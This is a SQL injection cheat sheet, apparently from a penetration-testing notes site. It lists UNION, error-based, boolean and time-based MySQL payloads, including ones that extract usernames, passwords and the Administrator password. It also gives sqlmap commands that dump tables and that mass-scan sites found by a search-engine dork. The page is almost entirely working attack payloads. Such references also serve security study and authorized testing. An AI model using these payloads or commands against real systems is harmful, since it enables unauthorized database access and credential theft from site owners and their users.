SQL Injection

UNION-Based

# How To Detect
'
-- abc

# Find Number Of Columns
' ORDER BY 2-- abc
' UNION NULL,NULL-- abc

# Test Columns Data Types
' UNION SELECT 'a',NULL-- abc
' UNION SELECT NULL,'a'-- abc

# Print Database Version
' UNION SELECT @@version,@@version-- abc

# Print Multiple Values On One Column
' UNION SELECT CONCAT('username','~','password') FROM users--

# Print Databases and Tables
' UNION SELECT table_name,table_schema FROM information_schema.tables-- abc

# Print Tables and Columns
' UNION SELECT table_name,column_name FROM information_schema.columns WHERE table_name ='user'-- abc

# Print Specific Database, Table and Columns
' UNION SELECT host,user FROM mysql.user-- abc

Error-Based

' AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT @@version)))-- abc

' AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1)))-- abc

Boolean-Based

# Detect
' AND 1=1-- abc
' AND 1=2-- abc
' AND '1'='1
' AND '1'='2

# Print Database Version
' AND @@version = '8.0.28'-- abc
' AND @@version LIKE '8.0.28'-- abc

# Print Database Version
' AND SUBSTRING((SELECT @@version),1,1) > '7'-- abc
' AND SUBSTRING((SELECT @@version),2,1) = '.'-- abc

# Print Database Name
' AND SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1) = 'i'-- abc

# Print Specific Entry
' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm

# Boolean Conditional Errors
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
' AND (CASE WHEN (SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1)='i') THEN 1/0 ELSE 'a' END)='a'-- abc

Time-Based

' AND SLEEP(5)-- abc

' AND IF(1=1,SLEEP(5),'a')-- abc

' AND IF((SUBSTRING((SELECT table_schema FROM information_schema.tables LIMIT 1),1,1)='i'),SLEEP(5),'a')-- abc

SQLMAP

sqlmap -u https://domain.com/product.php?id=1 -p id --proxy http://192.168.43.164:8080 --random-agent --delay 0.5 --threads 10 --flush-session -v 3

sqlmap -g inurl:/product.asp?id= --random-agent --batch --smart

sqlmap -r request.txt --force-ssl --random-agent --level=3 --risk=2 --technique=B --threads=10 --banner --dbs

sqlmap -r request.txt --force-ssl --random-agent -D database_name -T table_name1,table_name2,table_name3 --dump

sqlmap -r request.txt --force-ssl --random-agent -v 4 -p "id,cookie" --cookie="_ga=*" --skip "code,x,host,user-agent,referer"

Reference: https://portswigger.net/web-security/sql-injection/cheat-sheet

PreviousExtrasNextWeb Basics

Last updated